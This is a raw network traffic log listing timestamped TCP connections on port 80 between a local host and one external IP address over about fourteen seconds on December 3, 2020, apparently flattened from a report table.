                                    Dec 3, 2020 10:03:33.933628082 CET804990047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:33.933715105 CET4990080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:33.936414957 CET4990080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:33.953022957 CET804990047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:33.953109026 CET4990080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:33.969623089 CET804990047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:33.997836113 CET804990047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:33.997997999 CET4990080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:33.998023033 CET4990080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.014542103 CET804990047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.426474094 CET4990180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.443044901 CET804990147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.444473028 CET4990180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.447921038 CET4990180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.464518070 CET804990147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.464618921 CET4990180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.481118917 CET804990147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.507785082 CET804990147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.508305073 CET4990180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.508384943 CET4990180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.524950027 CET804990147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.922318935 CET4990280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.938940048 CET804990247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.939053059 CET4990280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.942137957 CET4990280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.958781958 CET804990247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:34.958951950 CET4990280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:34.975507021 CET804990247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.009032011 CET804990247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.009172916 CET4990280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.009282112 CET4990280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.025738955 CET804990247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.483750105 CET4990380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.500349045 CET804990347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.500478983 CET4990380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.504308939 CET4990380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.520817995 CET804990347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.520961046 CET4990380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.537514925 CET804990347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.563085079 CET804990347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:35.563287020 CET4990380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.563350916 CET4990380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:35.581537962 CET804990347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.020064116 CET4990480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.036700010 CET804990447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.036894083 CET4990480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.040003061 CET4990480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.056606054 CET804990447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.061310053 CET4990480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.077914953 CET804990447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.106219053 CET804990447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.106511116 CET4990480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.106553078 CET4990480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.124409914 CET804990447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.586937904 CET4990580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.603502989 CET804990547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.603683949 CET4990580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.607418060 CET4990580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.623941898 CET804990547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.624034882 CET4990580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.640394926 CET804990547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.665095091 CET804990547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:36.665196896 CET4990580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.665235043 CET4990580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:36.685022116 CET804990547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.075289011 CET4990680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.091967106 CET804990647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.092070103 CET4990680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.095773935 CET4990680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.112507105 CET804990647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.112641096 CET4990680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.129200935 CET804990647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.155846119 CET804990647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.155961990 CET4990680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.155989885 CET4990680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.172565937 CET804990647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.615430117 CET4990780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.631964922 CET804990747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.632668018 CET4990780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.635993004 CET4990780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.652502060 CET804990747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.652589083 CET4990780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.669096947 CET804990747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.696413994 CET804990747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:37.696573973 CET4990780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:37.713100910 CET804990747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.118010044 CET4990880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.134455919 CET804990847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.134552956 CET4990880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.137931108 CET4990880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.154351950 CET804990847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.154437065 CET4990880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.170846939 CET804990847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.195617914 CET804990847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.196077108 CET4990880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.196108103 CET4990880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.212923050 CET804990847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.594995975 CET4990980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.611490011 CET804990947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.611610889 CET4990980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.614969969 CET4990980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.631398916 CET804990947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.631479979 CET4990980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.647847891 CET804990947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.673676014 CET804990947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:38.673759937 CET4990980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.673799992 CET4990980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:38.690191984 CET804990947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.134399891 CET4991080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.150909901 CET804991047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.151066065 CET4991080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.153875113 CET4991080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.170372963 CET804991047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.170475006 CET4991080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.186924934 CET804991047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.215094090 CET804991047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.215276003 CET4991080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.215312004 CET4991080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.232204914 CET804991047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.661864996 CET4991180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.678365946 CET804991147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.682693005 CET4991180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.682728052 CET4991180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.701193094 CET804991147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.701303005 CET4991180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.717727900 CET804991147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.788075924 CET804991147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.788192034 CET4991180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.788269997 CET4991180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:39.804662943 CET804991147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:39.992027998 CET4991280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.008662939 CET804991247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.008789062 CET4991280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.012777090 CET4991280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.029359102 CET804991247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.029597998 CET4991280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.046108007 CET804991247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.177683115 CET804991247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.177820921 CET4991280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.177850962 CET4991280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.194638968 CET804991247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.386708021 CET4991380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.403280973 CET804991347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.403374910 CET4991380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.407026052 CET4991380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.423602104 CET804991347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.423697948 CET4991380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.440251112 CET804991347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.478810072 CET804991347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.478910923 CET4991380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.478939056 CET4991380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.495533943 CET804991347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.673655987 CET4991480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.690227985 CET804991447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.690562963 CET4991480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.694808006 CET4991480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.711411953 CET804991447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.712263107 CET4991480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.728822947 CET804991447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.754847050 CET804991447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.754954100 CET4991480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.755023956 CET4991480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.771481037 CET804991447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.946434975 CET4991580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.963020086 CET804991547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.963167906 CET4991580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.969554901 CET4991580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:40.986084938 CET804991547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:40.986166000 CET4991580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.002655983 CET804991547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.031966925 CET804991547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.032083035 CET4991580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.032120943 CET4991580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.049870014 CET804991547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.239315033 CET4991680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.255867004 CET804991647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.256015062 CET4991680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.260654926 CET4991680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.277282000 CET804991647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.277364016 CET4991680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.293895960 CET804991647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.322047949 CET804991647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.322201967 CET4991680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.322268009 CET4991680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.339951038 CET804991647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.530148983 CET4991780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.546787024 CET804991747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.547065020 CET4991780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.552180052 CET4991780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.568758965 CET804991747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.568866014 CET4991780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.585431099 CET804991747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.623253107 CET804991747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.623450994 CET4991780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.623509884 CET4991780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.640084028 CET804991747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.818619013 CET4991880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.835210085 CET804991847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.835314989 CET4991880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.839242935 CET4991880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.855783939 CET804991847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.855907917 CET4991880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.872340918 CET804991847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.890985966 CET804991847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:41.891154051 CET4991880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.891199112 CET4991880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:41.907661915 CET804991847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.107175112 CET4991980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.123816967 CET804991947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.123994112 CET4991980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.127760887 CET4991980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.144531012 CET804991947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.144725084 CET4991980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.161345005 CET804991947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.191509962 CET804991947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.191715956 CET4991980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.192018032 CET4991980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.208528996 CET804991947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.774985075 CET4992080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.791593075 CET804992047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.791747093 CET4992080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.798963070 CET4992080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.815613031 CET804992047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.815699100 CET4992080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.832240105 CET804992047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.862196922 CET804992047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:42.862329006 CET4992080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.862380981 CET4992080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:42.879441023 CET804992047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.076294899 CET4992180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.093023062 CET804992147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.093275070 CET4992180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.096434116 CET4992180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.113033056 CET804992147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.113145113 CET4992180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.129918098 CET804992147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.192491055 CET804992147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.192606926 CET4992180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.192665100 CET4992180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.209357023 CET804992147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.388457060 CET4992280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.405009985 CET804992247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.405129910 CET4992280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.408715963 CET4992280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.425215006 CET804992247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.425293922 CET4992280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.441777945 CET804992247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.473149061 CET804992247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.473233938 CET4992280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.473270893 CET4992280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.489788055 CET804992247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.665395975 CET4992380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.681745052 CET804992347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.681843042 CET4992380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.685041904 CET4992380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.701466084 CET804992347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.701520920 CET4992380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.717880011 CET804992347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.770551920 CET804992347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.770643950 CET4992380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.770673037 CET4992380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:43.790450096 CET804992347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:43.986274958 CET4992480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.002965927 CET804992447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.003129959 CET4992480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.011090994 CET4992480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.027614117 CET804992447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.027739048 CET4992480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.044214964 CET804992447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.159611940 CET804992447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.159729958 CET4992480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.159791946 CET4992480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.176281929 CET804992447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.376157999 CET4992580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.392738104 CET804992547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.392915010 CET4992580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.400609970 CET4992580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.417263031 CET804992547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.417494059 CET4992580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.434123039 CET804992547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.459861040 CET804992547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.460004091 CET4992580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.460170984 CET4992580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.476636887 CET804992547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.648623943 CET4992680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.665169954 CET804992647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.665406942 CET4992680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.672941923 CET4992680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.689421892 CET804992647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.689538956 CET4992680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.705857992 CET804992647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.739666939 CET804992647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.739844084 CET4992680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.739877939 CET4992680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.756625891 CET804992647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.949027061 CET4992780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.965645075 CET804992747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.965737104 CET4992780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.968765974 CET4992780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:44.985347033 CET804992747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:44.985562086 CET4992780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.002038002 CET804992747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.026278019 CET804992747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.026402950 CET4992780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.026495934 CET4992780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.042958021 CET804992747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.229686975 CET4992880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.246268034 CET804992847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.246541023 CET4992880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.253695011 CET4992880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.270313978 CET804992847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.270554066 CET4992880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.287137985 CET804992847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.313153028 CET804992847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.313399076 CET4992880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.313451052 CET4992880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.330055952 CET804992847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.742595911 CET4992980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.759243011 CET804992947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.759371996 CET4992980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.764949083 CET4992980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.781431913 CET804992947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.781553984 CET4992980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.798069000 CET804992947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.849649906 CET804992947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:45.849802017 CET4992980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.849931002 CET4992980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:45.866389990 CET804992947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.299685001 CET4993080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.316400051 CET804993047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.316512108 CET4993080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.322025061 CET4993080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.338599920 CET804993047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.338753939 CET4993080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.355356932 CET804993047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.379667044 CET804993047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.379859924 CET4993080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.379937887 CET4993080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.396439075 CET804993047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.773808956 CET4993180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.790533066 CET804993147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.790705919 CET4993180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.794392109 CET4993180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.810960054 CET804993147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.811038017 CET4993180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.827711105 CET804993147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.855204105 CET804993147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:46.855278015 CET4993180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.855338097 CET4993180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:46.871900082 CET804993147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.297133923 CET4993280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.314032078 CET804993247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.314562082 CET4993280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.319622040 CET4993280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.336255074 CET804993247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.336422920 CET4993280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.353009939 CET804993247.91.79.163192.168.2.3
